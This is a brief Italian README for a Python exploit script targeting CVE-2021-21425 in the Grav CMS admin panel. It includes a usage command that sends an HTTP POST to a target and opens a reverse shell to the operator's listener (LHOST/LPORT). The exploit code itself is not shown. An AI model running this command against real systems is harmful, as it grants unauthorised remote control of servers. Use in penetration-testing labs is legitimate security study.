
Script di exploit in Python per CVE-2021-21425 che prende di mira il pannello di amministrazione di Grav CMS, fornisce una reverse shell tramite richiesta HTTP POST con LHOST e LPORT configurabili.
questa è la mia versione, ne ho trovate molte in internet ma sono troppo scadenti
python3 exploit.py -u http://[IP]/grav-admin/ --lhost [YOUR TUN0 IP] --lport 4444
aspetta.. per 60 secondi otterrai una shell sul tuo listener